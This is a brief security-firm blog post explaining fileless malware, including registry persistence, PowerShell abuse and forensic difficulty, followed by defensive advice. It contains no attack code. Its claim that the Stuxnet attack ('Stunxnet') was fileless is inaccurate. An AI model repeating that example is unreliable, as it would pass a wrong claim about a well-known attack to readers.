From Del Brazil Senior Security Consultant – Advent IM
Simply put Fileless malware is a very well-engineered piece of malware that is very difficult to detect as part of any post incident analysis. It is designed to operate and survive in the memory of systems and as such once a system is re-booted the malware should/could be removed. Sounds pretty easy to defeat or so you’d think as normally any rebooting of a system would generally remove the malware; however there are now versions that write an entry into the registry of the system making the malware more persistent.
As with all computer software and hardware there are always unknown vulnerabilities that are there to be exploited by attackers, the trick is finding the vulnerabilities before the attacker and suitably addressing them to prevent an attack; however more often than not a vulnerability is only discovered after an attack has taken place and then it becomes a race to identify a solution and make available to legimate users before attackers conduct multiple attacks on various systems used by everyone and anyone.
A prime example of a Fileless malware attack would be one carried out on the Iranian nuclear facility by Stunxnet. The attack was directed towards Microsoft Windows machines using specific software and once a certain set of parameters/measures met the malware would unload its payload causing damage to systems using Microsoft Windows etc.
Due to the lack in a file being stored on the target machine/system any forensic examination would have be carried out in a certain manner to ensure that any potential evidence is correctly retained as to follow standard guidelines may erase or at least make it very difficult to recover any useful evidential material.
For this reason alone Fileless Malware is very attractive to would be attackers as it can leave little if any trace for standard digital investigative practices.
Attackers can develop/program malware to operate in the Powershell scripts where there can execute hidden commands which may render the target machine/system defenceless or even allow unauthorised access to sensitive data.
So the big question is, how do we defeat Fileless malware? There is no simple answer but as usual we go back to some basic principles in that systems (hardware/software) need to be updated and maintained in line with manufacturer’s requirements. This will not in any way guarantee to defeat any Fileless malware attack as generally speaking Fileless attacks are exploiting yet undiscovered/undisclosed vulnerabilities; however educating users not to download, install, update or import files, software, images or any other form of file may reduce the likelihood of a piece of Fileless malware being installed and/or executed.
Developers should also be required to use a Sandbox environment to avoid any potential infection attacking a live system, this coupled with enforcing the rule of least privilege may reduce the possibility of an attack. Most importantly of all ensure that the use of Powershell or similar programs are strictly controlled and monitored for any unauthorised or unusual activity.
- Posted by Ellie Hurst
- On 5th March 2018
- 0 Comments